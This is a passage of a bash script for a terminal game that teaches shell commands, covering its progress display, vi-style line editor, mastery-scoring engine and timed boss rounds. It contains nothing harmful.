      local pct=$((lm * 100 / lt)) filled=$((lm * BAR_W / lt)); local empty=$((BAR_W - filled))
      local bar_f bar_e; printf -v bar_f '%*s' "$filled" ''; printf -v bar_e '%*s' "$empty" ''
      local col; ((pct >= 80)) && col=$G || { ((pct >= 40)) && col=$Y || col=$R; }
      printf "  %s ${U}%2d${N} %-22s ${col}%s${D}%s${N} %3d%% (%d/%d)\n" "$boss_mark" "$lv" "${LEVEL_NAMES[$lv]:-}" "${bar_f// /█}" "${bar_e// /░}" "$pct" "$lm" "$lt"
    else
      printf "  %s ${U}%2d${N} %-22s ${D}%*s${N}\n" "$boss_mark" "$lv" "${LEVEL_NAMES[$lv]:-}" "$BAR_W" "no data"
    fi
  done
  _csv_count "$SC_DONE"; local sc_count=$REPLY
  ((SC_TOTAL > 0)) && printf '\n  %s %s/%d\n' "${U}Scenarios:${N}" "${M}${B}${sc_count}${N}" "$SC_TOTAL"
  _csv_count "$DISKS_FOUND"; local disk_count=$REPLY
  printf '  %s %s/%d\n' "${U}Floppy Disks:${N}" "${Y}${disk_count}${N}" "$_DISK_TOTAL"
  if ((BOSS_BEATEN >= MAX_LEVEL)); then
    printf '\n  %s\n' "${U}Records${N}"
    if ((BEST_CHALLENGE > 0)); then
      printf '  %s %s\n' "${U}Challenge:${N}" "${Y}${BEST_CHALLENGE}${N}"
    else
      printf '  %s\n' "${D}No records yet — try challenge!${N}"
    fi
  fi
}

_S_ANSWERED=0 _S_CORRECT=0 _S_STREAK=0 _S_BEST_STREAK=0 _S_MASTERED=0 _S_START=0
_session_init() { printf -v _S_START '%(%s)T' -1; _S_ANSWERED=0 _S_CORRECT=0 _S_STREAK=0 _S_BEST_STREAK=0 _S_MASTERED=0; _disk_check nightowl; }
_QUIT=0
_quit() {
  _sflush_if_dirty
  printf '\n'
  if ((_S_ANSWERED > 0)); then
    local _ts; printf -v _ts '%(%s)T' -1; local elapsed=$((_ts - _S_START))
    local m=$((elapsed / 60)) s=$((elapsed % 60))
    printf '%s\n%s\n  %s    %s\n' "${U}Session Summary${N}" "${D}----------------------------------------${N}" "${U}Answered:${N}" "${B}${_S_ANSWERED}${N}"
    printf '  %s     %s' "${U}Correct:${N}" "${G}${_S_CORRECT}${N}"
    ((_S_ANSWERED > 0)) && printf ' (%d%%)' $((_S_CORRECT * 100 / _S_ANSWERED))
    printf '\n  %s %s\n' "${U}Best streak:${N}" "${W}${B}${_S_BEST_STREAK}${N}"
    ((_S_MASTERED > 0)) && printf '  %s    %s\n' "${U}Mastered:${N}" "${G}${_S_MASTERED}${N}"
    printf '  %s        %dm %ds\n%s\n' "${U}Time:${N}" "$m" "$s" "${D}----------------------------------------${N}"
    read -rsp "${D}Press Enter to continue...${N}"; echo
  fi
  _QUIT=1
}

input="" cursor=0 mode="insert" _rep=""
declare -a UNDO_STACK=()  # Multi-level undo
hdr() {
  local fire=""; ((streak>=FIRE_STREAK)) && fire="  ${Y}${B}*${N}"
  printf '\e[H%s\e[K\n%s\e[K\n%s\e[K\n' "${W}${B}${PLAYER_NAME:-anon}${N}${fire}" "${U}Level $1${N}: ${LEVEL_NAMES[$1]:-}" "${U}[$2/$3]${N}  ${D}Tab=man${N}"
}
qdisp() { bar; printf "\n${C}%s${N}\n\n" "$1"; }
_wrong_feedback() { ((OPT_SOUND)) && printf '\a'; printf '\e[7m'; read -t 0.05 -rsn1 _ ||:; printf '\e[0m'; }
_wrong_show() { _wrong_feedback
  ((_SANDBOX_REQUIRE_FAIL)) && printf '\n%s\n' "${R}use the exact string from the question${N}"
  [[ -n "$_SANDBOX_OUTPUT" ]] && printf '\n%s %s\n' "${D}output:${N}" "$_SANDBOX_OUTPUT"
  printf '%s  %s %s\n\n' "${R}x${N}" "${D}expected:${N}" "${Y}${ans}${N}"; }
_sc() { [[ -n "$input" ]] && { HIST+=("$input"); HIST_IDX=${#HIST[@]}; HIST_SAVE=""; }; ((_S_ANSWERED++)); ((_S_CORRECT++)); ((_S_STREAK++)); ((_S_STREAK > _S_BEST_STREAK)) && _S_BEST_STREAK=$_S_STREAK; [[ -n "$_SANDBOX_OUTPUT" ]] && printf '\n%s\n' "${W}${_SANDBOX_OUTPUT}${N}"; }
_sw() { ((_S_ANSWERED++)); _S_STREAK=0; _wrong_show; }
bar() { local f e p=$((qi<TOT?qi:TOT)); printf -v f '%*s' "$p" ''; printf -v e '%*s' "$((TOT-p))" ''; printf "${B}[${G}%s${D}%s${B}]${N}" "${f// /█}" "${e// /░}"; }
_draw_buf() {
  _DB=$'\e[?25l\r\e[K'
  ((VI_MODE)) && [[ $mode != insert ]] && _DB+="${R}${PROMPT_CHAR}${N}" || _DB+="${W}${PROMPT_CHAR}${N}"
  _DB+="$input"
  local _pre="${input:0:cursor}" disp_len=${#input} disp_cur; disp_cur=${#_pre}
  ((disp_cur < disp_len)) && printf -v _DB '%s\e[%dD' "$_DB" "$((disp_len - disp_cur))"
  _DB+=$'\e[?25h'
}
draw() { _draw_buf; printf '%s' "$_DB"; }

_wfwd() { while ((cursor<${#input})) && [[ "${input:cursor:1}" != " " ]]; do ((++cursor)); done; while ((cursor<${#input})) && [[ "${input:cursor:1}" == " " ]]; do ((++cursor)); done; ((cursor>=${#input}&&${#input}>0)) && cursor=$((${#input}-1)); }
_wbck() { ((cursor>0)) && ((cursor--)); while ((cursor>0)) && [[ "${input:cursor:1}" == " " ]]; do ((cursor--)); done; while ((cursor>0)) && [[ "${input:cursor-1:1}" != " " ]]; do ((cursor--)); done; }
_wend() { ((cursor<${#input}-1)) && ((++cursor)); while ((cursor<${#input}-1)) && [[ "${input:cursor:1}" == " " ]]; do ((++cursor)); done; while ((cursor<${#input}-1)) && [[ "${input:cursor+1:1}" != " " ]]; do ((++cursor)); done; }
_clamp() { ((cursor>=${#input})) && cursor=$((${#input}>0?${#input}-1:0)); }
_vi_read() { IFS= read -rsn1 c2; }
_vi_hist() {
  ((_rl_hist)) || return 1
  if (($1 < 0)); then
    ((${#HIST[@]}>0 && HIST_IDX>0)) || return 1
    ((HIST_IDX==${#HIST[@]})) && HIST_SAVE="$input"
    ((HIST_IDX--)); input="${HIST[$HIST_IDX]}"
  else
    ((HIST_IDX<${#HIST[@]})) || return 1
    ((++HIST_IDX)); ((HIST_IDX==${#HIST[@]})) && input="$HIST_SAVE" || input="${HIST[$HIST_IDX]}"
  fi
  cursor=${#input}; _clamp
}
# Sets _rs/_re (start/end exclusive) for a vi motion. Returns 1 if no range.
_vi_range() {
  local m=$1; _re=$cursor _rs=$cursor
  case "$m" in
    h) ((cursor>0)) && _rs=$((cursor-1)) || return 1;;
    l) ((_re<${#input})) && _re=$((cursor+1)) || return 1;;
    w) while ((_re<${#input})) && [[ "${input:_re:1}" != " " ]]; do ((++_re)); done; while ((_re<${#input})) && [[ "${input:_re:1}" == " " ]]; do ((++_re)); done;;
    e) ((_re<${#input}-1)) && ((++_re)); while ((_re<${#input}-1)) && [[ "${input:_re:1}" == " " ]]; do ((++_re)); done; while ((_re<${#input}-1)) && [[ "${input:_re+1:1}" != " " ]]; do ((++_re)); done; ((++_re));;
    b) ((_re>0)) && ((_re--)); while ((_re>0)) && [[ "${input:_re:1}" == " " ]]; do ((_re--)); done; while ((_re>0)) && [[ "${input:_re-1:1}" != " " ]]; do ((_re--)); done; _rs=$_re; _re=$cursor;;
    f|F|t|T) _vi_read; local p
      if [[ "$m" == "f" ]]; then for ((p=cursor+1;p<${#input};p++)); do [[ "${input:p:1}" == "$c2" ]] && { _re=$((p+1)); break; }; done
      elif [[ "$m" == "F" ]]; then for ((p=cursor-1;p>=0;p--)); do [[ "${input:p:1}" == "$c2" ]] && { _rs=$p; _re=$cursor; break; }; done
      elif [[ "$m" == "t" ]]; then for ((p=cursor+1;p<${#input};p++)); do [[ "${input:p:1}" == "$c2" ]] && { _re=$p; break; }; done
      else for ((p=cursor-1;p>=0;p--)); do [[ "${input:p:1}" == "$c2" ]] && { _rs=$((p+1)); _re=$cursor; break; }; done; fi;;
    \$) _re=${#input};; 0) _rs=0; _re=$cursor;;
    *) return 1;;
  esac
  ((_rs>_re)) && { local _t=$_rs; _rs=$_re; _re=$_t; }
  ((_rs==_re)) && return 1
  return 0
}
_del() { # $1=motion  (also used by c via _vi_normal)
  case "$1" in d|c) _vi_reg="$input"; input="" cursor=0; return;; esac
  _vi_range "$1" || return
  _vi_reg="${input:_rs:_re-_rs}"; input="${input:0:_rs}${input:_re}"; cursor=$_rs; _clamp
}

# ═══ VI HANDLER ═══
_yank() { # $1=motion — like _del but only copies to register
  case "$1" in y) _vi_reg="$input"; return;; esac
  _vi_range "$1" || return
  _vi_reg="${input:_rs:_re-_rs}"
}
# $1=dir(f/F/t/T) $2=char $3=count
_vi_fmove() {
  local _d=$1 _ch=$2 _cnt=$3 p
  case "$_d" in
    f) for ((_i=0;_i<_cnt;_i++)); do for ((p=cursor+1;p<${#input};p++)); do [[ "${input:p:1}" == "$_ch" ]] && { cursor=$p; break; }; done; done;;
    F) for ((_i=0;_i<_cnt;_i++)); do for ((p=cursor-1;p>=0;p--)); do [[ "${input:p:1}" == "$_ch" ]] && { cursor=$p; break; }; done; done;;
    t) local _lp=$((cursor+1)); for ((_i=0;_i<_cnt;_i++)); do for ((p=_lp;p<${#input};p++)); do [[ "${input:p:1}" == "$_ch" ]] && { cursor=$((p-1)); _lp=$((p+1)); break; }; done; done;;
    T) local _lp=$((cursor-1)); for ((_i=0;_i<_cnt;_i++)); do for ((p=_lp;p>=0;p--)); do [[ "${input:p:1}" == "$_ch" ]] && { cursor=$((p+1)); _lp=$((p-1)); break; }; done; done;;
  esac
}
_vi_normal() {
  if [[ "$c" =~ ^[1-9]$ ]] || { [[ "$c" == "0" ]] && [[ -n "$_rep" ]]; }; then _rep+="$c"; return 1; fi
  local _n=${_rep:-1}; _rep=""
  case "$c" in s|S|x|X|D|C|d|c|r|'~'|p|P) UNDO_STACK+=("$cursor:$input");; esac
  case "$c" in
    i) mode="insert"; draw;; a) mode="insert"; ((cursor<${#input})) && ((++cursor)); draw;;
    A) mode="insert"; cursor=${#input}; draw;; I) mode="insert"; cursor=0; draw;;
    s) ((${#input}>0)) && { _vi_reg="${input:cursor:1}"; input="${input:0:cursor}${input:cursor+1}"; }; mode="insert"; draw;;
    S) _vi_reg="$input"; input="" cursor=0 mode="insert"; draw;;
    h) for ((_i=0;_i<_n&&cursor>0;_i++)); do ((cursor--)); done; draw;;
    l) for ((_i=0;_i<_n&&cursor<${#input}-1;_i++)); do ((++cursor)); done; draw;;
    k) _vi_hist -1 && draw;;
    j) _vi_hist 1 && draw;;
    0) cursor=0; draw;; \$) cursor=$((${#input}>0?${#input}-1:0)); draw;;
    ^) cursor=0; while ((cursor<${#input})) && [[ "${input:cursor:1}" == " " ]]; do ((++cursor)); done; draw;;
    w) for ((_i=0;_i<_n;_i++)); do _wfwd; done; draw;;
    b) for ((_i=0;_i<_n;_i++)); do _wbck; done; draw;;
    e) for ((_i=0;_i<_n;_i++)); do _wend; done; draw;;
    f|F|t|T) _vi_read; _vi_lastf="${c}${c2}"; _vi_fmove "$c" "$c2" "$_n"; draw;;
    \;) [[ -n "$_vi_lastf" ]] && { local _sv="$_vi_lastf"; _vi_fmove "${_vi_lastf:0:1}" "${_vi_lastf:1:1}" "$_n"; _vi_lastf="$_sv"; draw; };;
    ,) [[ -n "$_vi_lastf" ]] && { local _sv="$_vi_lastf" _rv
      case "${_vi_lastf:0:1}" in f) _rv=F;; F) _rv=f;; t) _rv=T;; T) _rv=t;; esac
      _vi_fmove "$_rv" "${_vi_lastf:1:1}" "$_n"; _vi_lastf="$_sv"; draw; };;
    x) _vi_reg=""; for ((_i=0;_i<_n&&${#input}>0&&cursor<${#input};_i++)); do _vi_reg+="${input:cursor:1}"; input="${input:0:cursor}${input:cursor+1}"; done; _clamp; draw;;
    X) _vi_reg=""; for ((_i=0;_i<_n&&cursor>0;_i++)); do _vi_reg="${input:cursor-1:1}$_vi_reg"; input="${input:0:cursor-1}${input:cursor}"; ((cursor--)); done; draw;;
    D) _vi_reg="${input:cursor}"; input="${input:0:cursor}"; ((cursor>0)) && ((cursor--)); draw;;
    C) _vi_reg="${input:cursor}"; input="${input:0:cursor}"; mode="insert"; draw;;
    r) _vi_read; [[ -n "$c2" && "$c2" != $'\x1b' ]] && { input="${input:0:cursor}${c2}${input:cursor+1}"; draw; };;
    '~') for ((_i=0;_i<_n&&cursor<${#input};_i++)); do local _ch="${input:cursor:1}"
      if [[ "$_ch" =~ [a-z] ]]; then _ch="${_ch^^}"; elif [[ "$_ch" =~ [A-Z] ]]; then _ch="${_ch,,}"; fi
      input="${input:0:cursor}${_ch}${input:cursor+1}"; ((cursor<${#input}-1)) && ((++cursor)); done; draw;;
    p) for ((_i=0;_i<_n;_i++)); do [[ -n "$_vi_reg" ]] && { input="${input:0:cursor+1}${_vi_reg}${input:cursor+1}"; ((cursor+=${#_vi_reg})); }; done; draw;;
    P) for ((_i=0;_i<_n;_i++)); do [[ -n "$_vi_reg" ]] && { input="${input:0:cursor}${_vi_reg}${input:cursor}"; ((cursor+=${#_vi_reg}-1)); }; done; draw;;
    y) _vi_read; local _ic=""; [[ "$c2" =~ ^[1-9]$ ]] && { _ic="$c2"; _vi_read; while [[ "$c2" =~ ^[0-9]$ ]]; do _ic+="$c2"; _vi_read; done; }; local _yn=$((_n * ${_ic:-1})); for ((_i=0;_i<_yn;_i++)); do _yank "$c2"; done; draw;;
    d) _vi_read; local _ic=""; [[ "$c2" =~ ^[1-9]$ ]] && { _ic="$c2"; _vi_read; while [[ "$c2" =~ ^[0-9]$ ]]; do _ic+="$c2"; _vi_read; done; }; local _dn=$((_n * ${_ic:-1})); for ((_i=0;_i<_dn;_i++)); do _del "$c2"; done; draw;;
    c) _vi_read; local _ic=""; [[ "$c2" =~ ^[1-9]$ ]] && { _ic="$c2"; _vi_read; while [[ "$c2" =~ ^[0-9]$ ]]; do _ic+="$c2"; _vi_read; done; }; local _dn=$((_n * ${_ic:-1})); for ((_i=0;_i<_dn;_i++)); do _del "$c2"; done; mode="insert"; draw;;
    u) ((${#UNDO_STACK[@]}>0)) && { local _u="${UNDO_STACK[-1]}"; unset 'UNDO_STACK[-1]'; cursor="${_u%%:*}"; input="${_u#*:}"; draw; };;
    g) _vi_read; [[ "$c2" == "g" ]] && { cursor=0; draw; };;
    G) cursor=$((${#input}>0?${#input}-1:0)); draw;;
    $'\x1b') local _e1 _e2; read -rsn1 -t 0.01 _e1 || _e1=""
      if [[ "$_e1" == "[" ]]; then read -rsn1 -t 0.01 _e2 || _e2=""
        case "$_e2" in A) _vi_hist -1 && draw;; B) _vi_hist 1 && draw;; C) ((cursor<${#input}-1)) && ((++cursor)) && draw;; D) ((cursor>0)) && ((cursor--)) && draw;; esac; fi;;
    $'\x04') _quit;;
    q) _quit;;
    :) ;;
    \?) ((_rl_hints)) && { printf '\n%s\n%s\n%s\n%s\n\n%s\n%s\n%s\n%s\n%s\n%s\n' \
      "${C}hl${N} move  ${C}kj${N} history  ${C}wb${N} word  ${C}fFtT${N}+char find  ${C};,${N} repeat find  ${C}0\$^/gg/G${N} line" \
      "${C}x/X${N} del char  ${C}dw/db/de/dd${N} del  ${C}cw/cb/ce/cc${N} change  ${C}r${N} replace  ${C}~${N} case" \
      "${C}y${N}+motion yank  ${C}p/P${N} paste  ${C}s/S${N} subst  ${C}i/a/I/A${N} insert  ${C}u${N} undo(stack)" \
      "${C}Tab${N} man  ${C}Ctrl+d${N} menu  ${C}Ctrl+w${N} del word  ${C}Ctrl+u${N} del line  ${C}[num]cmd${N} repeat" \
      "${U}vi mode for your shell${N} ${D}(~/.inputrc):${N}" \
      "${D}  set editing-mode vi${N}" \
      "${D}  set show-mode-in-prompt on${N}" \
      "${D}  set keyseq-timeout 50${N}" \
      "${D}  set vi-ins-mode-string \\1\\e[97m\\2\$\\1\\e[0m\\2 ${N}" \
      "${D}  set vi-cmd-mode-string \\1\\e[91m\\2\$\\1\\e[0m\\2 ${N}"; read -rsp "${D}Press Enter...${N}"; printf '\e[2J'; _REDRAW_HDR; draw; };;
    '') ((_man_open)) && printf '%s\e7\n\e[J\e8%s' "$_SY" "$_SN"; _man_open=0; echo; return 0;;
  esac
  return 1
}

_rl_rem() { local _n; printf -v _n '%(%s)T' -1; REPLY=$((_rl_deadline - _n)); ((REPLY < 0)) && REPLY=0; }

# $1: allow manpages  $2: allow history  $3: timeout (0=none, returns 1 on timeout)
# Caller defines _REDRAW_HDR(). Uses dynamic scoping for ans, HIST, etc.
_read_line() {
  local _rl_hints=${1:-1} _rl_hist=${2:-1} _rl_timeout=${3:-0} _rl_deadline=0
  input="" cursor=0 mode="insert" _rep="" _man_open=0
  UNDO_STACK=()
  _vi_reg="" _vi_lastf="" _vi_dot="" _vi_dotrep=""
  local _rl_last_sec=0
  if ((_rl_timeout > 0)); then printf -v _rl_deadline '%(%s)T' -1; ((_rl_deadline += _rl_timeout)); _rl_last_sec=$_rl_deadline; fi
  ((_rl_hist)) && { HIST_IDX=${#HIST[@]}; HIST_SAVE=""; }
  read -t 0.01 -rsn 1000 ||:
  draw
  while true; do
    if ((_rl_deadline)); then
      local _now; printf -v _now '%(%s)T' -1; local _rem=$((_rl_deadline - _now))
      ((_rem <= 0)) && { printf '\e[?25h'; input=""; return 1; }
      if ((_now != _rl_last_sec)); then _rl_last_sec=$_now; _REDRAW_HDR; draw; fi
      IFS= read -rsn1 -t 1 c || {
        printf -v _now '%(%s)T' -1; _rem=$((_rl_deadline - _now))
        ((_rem <= 0)) && { printf '\e[?25h'; input=""; return 1; }
        _rl_last_sec=$_now; _REDRAW_HDR; draw; continue
      }
    else
      IFS= read -rsn1 c || break
    fi
    if [[ "$c" == $'\t' ]]; then
      if ((_rl_hints)); then
        ((_man_open)) && _man_open=0 || _man_open=1
        _draw_buf
        if ((_man_open)); then
          explain "$ans" buf
          printf '%s\e[?25l\n\e[J%s\e[%dA\r%s%s' "$_SY" "$_EBUF" "$((_EXP_LINES + 1))" "$_DB" "$_SN"
        else
          printf '%s\e[?25l\n\e[J\e[A\r%s%s' "$_SY" "$_DB" "$_SN"
        fi
      else printf '%s\e[?25l\n%s%s' "$_SY" "${R}Not available in this mode!${N}" "$_SN"; sleep 0.5; _draw_buf; printf '%s\e[A\r\e[J%s%s' "$_SY" "$_DB" "$_SN"; fi
      continue
    fi
    if [[ "$mode" == "insert" ]]; then
      case "$c" in
        $'\x04') _quit;;
        $'\x1b')
          local _e1 _e2; read -rsn1 -t 0.01 _e1 || _e1=""
          if [[ "$_e1" == "[" ]]; then
            read -rsn1 -t 0.01 _e2 || _e2=""
            case "$_e2" in A) _vi_hist -1 && draw;; B) _vi_hist 1 && draw;; C) ((cursor<${#input})) && ((++cursor)) && draw;; D) ((cursor>0)) && ((cursor--)) && draw;; esac
          elif [[ "$_e1" == f ]]; then  # Alt-f: forward word
            while ((cursor<${#input})) && [[ "${input:cursor:1}" == " " ]]; do ((++cursor)); done
            while ((cursor<${#input})) && [[ "${input:cursor:1}" != " " ]]; do ((++cursor)); done; draw
          elif [[ "$_e1" == b ]]; then  # Alt-b: back word
            while ((cursor>0)) && [[ "${input:cursor-1:1}" == " " ]]; do ((cursor--)); done
            while ((cursor>0)) && [[ "${input:cursor-1:1}" != " " ]]; do ((cursor--)); done; draw
          elif [[ "$_e1" == d ]]; then  # Alt-d: delete word forward
            local _wp=$cursor
            while ((_wp<${#input})) && [[ "${input:_wp:1}" == " " ]]; do ((_wp++)); done
            while ((_wp<${#input})) && [[ "${input:_wp:1}" != " " ]]; do ((_wp++)); done
            input="${input:0:cursor}${input:_wp}"; draw
          elif [[ -z "$_e1" ]] && ((VI_MODE)); then
            UNDO_STACK+=("$cursor:$input"); mode="normal"; ((cursor>0)) && ((cursor--)); draw
          fi;;
        $'\x7f'|$'\b') ((cursor>0)) && { input="${input:0:cursor-1}${input:cursor}"; ((cursor--)); draw; };;
        $'\x17') if ((cursor>0)); then local _wp=$((cursor-1))  # Ctrl-w: delete word back
          while ((_wp>0)) && [[ "${input:_wp:1}" == " " ]]; do ((_wp--)); done
          while ((_wp>0)) && [[ "${input:_wp-1:1}" != " " ]]; do ((_wp--)); done
          input="${input:0:_wp}${input:cursor}"; cursor=$_wp; draw; fi;;
        $'\x15') ((cursor>0)) && { input="${input:cursor}"; cursor=0; draw; };;  # Ctrl-u: delete to start
        $'\x01') cursor=0; draw;;  # Ctrl-a: beginning of line
        $'\x05') cursor=${#input}; draw;;  # Ctrl-e: end of line
        $'\x02') ((cursor>0)) && ((cursor--)) && draw;;  # Ctrl-b: back one char
        $'\x06') ((cursor<${#input})) && ((++cursor)) && draw;;  # Ctrl-f: forward one char
        $'\x0b') input="${input:0:cursor}"; draw;;  # Ctrl-k: kill to end of line
        $'\x14') if ((cursor>0 && ${#input}>=2)); then  # Ctrl-t: transpose chars
          local _tc; if ((cursor>=${#input})); then _tc=$((cursor-2)); else _tc=$((cursor-1)); fi
          ((_tc>=0)) && { input="${input:0:_tc}${input:_tc+1:1}${input:_tc:1}${input:_tc+2}"; ((cursor<${#input})) && ((++cursor)); draw; }; fi;;
        '') ((_man_open)) && printf '%s\e7\n\e[J\e8%s' "$_SY" "$_SN"; _man_open=0; echo; return 0;;
        *) ((${#input} < 512)) && { input="${input:0:cursor}${c}${input:cursor}"; ((++cursor)); draw; };;
      esac
    elif ((VI_MODE)); then
      _vi_normal && return || { ((_QUIT)) && return 2; continue; }
    fi
    ((_QUIT)) && return 2
  done
}

# ═══ SCORING ENGINE ═══
_sdirty=0
_sflush_if_dirty() { ((_sdirty)) && { _sflush; _sdirty=0; }; }
_MODE_TAG=""
_sset() { _hash "$1"; local _ts; printf -v _ts '%(%s)T' -1; _sc[$REPLY]="$2|$_MODE_TAG|$_ts"; (( ++_sdirty >= 10 )) && { _sflush; _sdirty=0; }; }
_mode_init() {
  _MODE_TAG=$1
  declare -gA _sc; _sc=()
  [[ -f "$DATA/scores" ]] && while IFS='|' read -r k v; do
    [[ "$k" == "#"* ]] && continue
    _sc[$k]=$v
  done < "$DATA/scores"
  # Decay stale mastery (once per 24h): tier≥2 + >30d → 1, tier≥1 + >14d → 0
  local _now _decayed=0; printf -v _now '%(%s)T' -1
  if ((_now - LAST_DECAY >= _DECAY_INTERVAL)); then
    for _dk in "${!_sc[@]}"; do
      local _dv="${_sc[$_dk]}" _dt="${_sc[$_dk]%%|*}"
      local _deps="${_dv##*|}"  # last field: epoch or mode_tag
      [[ "$_deps" =~ ^[0-9]{10,}$ ]] || continue  # no timestamp = no decay
      local _age=$((_now - _deps))
      if ((_dt >= 2 && _age > _DECAY_T2)); then
        local _mid="${_dv#*|}"; _sc[$_dk]="$((_dt - 1))|${_mid%|*}|$_now"; _decayed=1
      elif ((_dt == 1 && _age > _DECAY_T1)); then
        local _mid="${_dv#*|}"; _sc[$_dk]="0|${_mid%|*}|$_now"; _decayed=1
      fi
    done
    LAST_DECAY=$_now; _save_profile
    ((_decayed)) && _sflush
  fi
  _sget() { _hash "$1"; local _v="${_sc[$REPLY]:-1}"; REPLY="${_v%%|*}"; }
  HIST=() HIST_IDX=0 HIST_SAVE=""
  _interactive=1
  ((SANDBOX_MODE)) && _sandbox_init
}
_preq_reset() { ((SANDBOX_MODE && _SANDBOX_DESTRUCTIVE)) && { _sandbox_reset; _SANDBOX_DESTRUCTIVE=0; }; }

# ═══ RUN ENGINE ═══
run() {
  local lv=$1 boss_only=${2:-0} shuf=() qi=$QI streak=0
  local -a SEEN_PROMPTS=()
  _mode_init "$lv"

  generate_level "$lv"
  TOT=${#CURRENT_QUESTIONS[@]}
  # Prioritize by tier: 1 (blank) > 2 (recall) - no tier 0 copy mode
  local t1=() t2=()
  for q in "${CURRENT_QUESTIONS[@]}"; do
    _qparse "$q"
    _sget "$_qprompt"; case "$REPLY" in 0|1) t1+=("$q");; *) t2+=("$q");; esac
  done
  # Shuffle and interleave: tier 1 (learning) prioritized, tier 2 (mastered) mixed in
  local _shuf1=() _shuf2=()
  ((${#t1[@]} > 0)) && { _shuf1=("${t1[@]}"); _fshuffle _shuf1; }
  ((${#t2[@]} > 0)) && { _shuf2=("${t2[@]}"); _fshuffle _shuf2; }
  shuf=()
  local i1=0 i2=0
  while ((i1 < ${#_shuf1[@]} || i2 < ${#_shuf2[@]})); do
    # 2:1 ratio favoring tier 1 (learning), with tier 2 (mastered) mixed in
    if ((i1 < ${#_shuf1[@]} && (i2 >= ${#_shuf2[@]} || RANDOM % 3 != 0))); then
      shuf+=("${_shuf1[$i1]}"); ((++i1))
    elif ((i2 < ${#_shuf2[@]})); then
      shuf+=("${_shuf2[$i2]}"); ((++i2))
    fi
  done
  if ((boss_only)); then
    printf '%s\n' "${W}Straight to boss!${N}"
    sleep 1
  # Safety check: if no questions to practice, skip to boss
  elif ((${#shuf[@]} == 0)); then
    printf '%s\n' "${W}No questions to practice. Straight to boss!${N}"
    sleep 1
  fi
  if ((!boss_only)); then
  while ((qi < ${#shuf[@]})); do
    _preq_reset

    _qparse "${shuf[$qi]}"; local prompt=$_qprompt ans=$_qans
    SEEN_PROMPTS+=("$prompt")  # Track for boss exclusion
    _sget "$prompt"; local tier=$REPLY
    # Fire mode: force tier 2 (pure recall)
    local _real_tier=$REPLY
    ((streak>=FIRE_STREAK)) && tier=2
    _REDRAW_HDR() { printf '%s' "$_SY"; hdr "$lv" "$((qi+1))" "$TOT"; qdisp "$prompt"; printf '\e[J%s' "$_SN"; }
    printf '\e[2J'; _REDRAW_HDR
    while true; do
      _read_line 1 1
      ((_QUIT)) && break
      [[ -z "$input" ]] && { draw; continue; }
      if check "$input" "$_qanswers"; then
        _sc; _show_alts "$input" "$_qanswers" "$_qdelim"; _disk_check streak
        local _new_tier=$((_real_tier<2?_real_tier+1:2))
        ((_real_tier < 2 && _new_tier >= 2)) && ((_S_MASTERED++))
        if ((streak>=FIRE_STREAK)); then
          printf '\n%s\n' "${Y}${B}* ON FIRE! +2${N}"
        else
          printf '\n%s\n' "${G}${B}+${N}"
        fi
        ((++streak)); _sset "$prompt" "$_new_tier"
        _pause; ((++qi)); QI=$qi; save; break
      elif ((_SANDBOX_REQUIRE_FAIL == 2)); then
        printf '\n%s\n' "${Y}right command — use the exact string from the question${N}"
        sleep 1; printf '\e[2J'; _REDRAW_HDR; continue
      else
        [[ -n "$input" ]] && { HIST+=("$input"); HIST_IDX=${#HIST[@]}; HIST_SAVE=""; }
        ((_S_ANSWERED++)); _S_STREAK=0; _wrong_show; _disk_check wrong "$input"
        explain "$ans"
        streak=0; _sset "$prompt" "$((_real_tier>0?_real_tier-1:0))"; _pause
      fi
      _sget "$prompt"; tier=$REPLY; printf '\e[2J'; _REDRAW_HDR
    done
    ((_QUIT)) && break
  done
  fi  # !boss_only
  ((_QUIT)) && { _sflush_if_dirty; return 1; }
  # === BOSS ROUND ===
  _boss_splash "$lv"

  # Boss draws from current level only (no old-level filler)
  local _cur_q=() boss_q=() boss_correct=0 boss_total=$BOSS_TOTAL _boss_thresh=$BOSS_THRESHOLD seen_q=()
  while IFS= read -r _line; do
    [[ -n "$_line" ]] && _cur_q+=("$_line")
  done <<< "${_LEVEL_CACHE[$lv]}"
  local -A _seen_map; for s in "${SEEN_PROMPTS[@]}"; do _seen_map[$s]=1; done
  for q in "${_cur_q[@]}"; do
    _qparse "$q"
    [[ -n "${_seen_map[$_qprompt]:-}" ]] && seen_q+=("$q")
  done
  # Prefer practiced questions, fall back to all current-level questions
  if ((${#seen_q[@]} >= boss_total)); then
    boss_q=("${seen_q[@]}"); _fshuffle_n boss_q "$boss_total"
  else
    boss_q=("${_cur_q[@]}"); _fshuffle_n boss_q "$boss_total"
  fi

  local _bt=$((BOSS_TIMER + lv / 3))  # scale: 15s@L1 → 25s@L30
  for ((bi=0; bi<${#boss_q[@]}; bi++)); do
    _qparse "${boss_q[$bi]}"; local prompt=$_qprompt ans=$_qans
    [[ -z "$prompt" ]] && { ((boss_total--)); ((boss_total > 0 && _boss_thresh > boss_total)) && _boss_thresh=$boss_total; continue; }
    _sget "$prompt"; local _boss_tier=$REPLY
    _REDRAW_HDR() {
      local _t=$_bt
      if ((${_rl_deadline:-0})); then _rl_rem; _t=$REPLY; fi
      printf '%s\e[H%s  %s\e[K\n\e[K\n%s\e[K\n\e[K\n\e[J%s' "$_SY" "${M}${B}═══ BOSS ${U}$((bi+1))/${boss_total}${M} ═══${N}" "${W}${_t}s${N}" "${C}${prompt}${N}" "$_SN"
    }
    printf '\e[2J'; _REDRAW_HDR
    if _read_line 0 0 "$_bt"; then
      ((_QUIT)) && break
      ((_S_ANSWERED++))
      if check "$input" "$_qanswers"; then
        ((++boss_correct)); ((_S_CORRECT++)); ((_S_STREAK++))
        ((_S_STREAK > _S_BEST_STREAK)) && _S_BEST_STREAK=$_S_STREAK
        _sset "$prompt" "$((_boss_tier<2?_boss_tier+1:2))"
        printf '%s\n' "${G}${B}+${N}"
      else
        _S_STREAK=0; _sset "$prompt" "$((_boss_tier>0?_boss_tier-1:0))"; _wrong_show
        explain "$ans"
      fi
    else
      ((_QUIT)) && break
      ((_S_ANSWERED++)); _S_STREAK=0; _sset "$prompt" "$((_boss_tier>0?_boss_tier-1:0))"; _wrong_feedback
      printf '\n%s  %s %s\n\n' "${R}${B}TIME'S UP${N}" "${D}expected:${N}" "${Y}${ans}${N}"; explain "$ans"
    fi
    _pause
  done
  # Save boss defeat even if quitting, then exit early
  if ((_QUIT)) && ((boss_total > 0 && boss_correct >= _boss_thresh)) && ((BOSS_BEATEN < lv)); then
    BOSS_BEATEN=$lv; _save_profile
  fi
  ((_QUIT)) && { _sflush_if_dirty; return 1; }

  # Results
  printf '%s\e[2J\e[H' "$_SY"
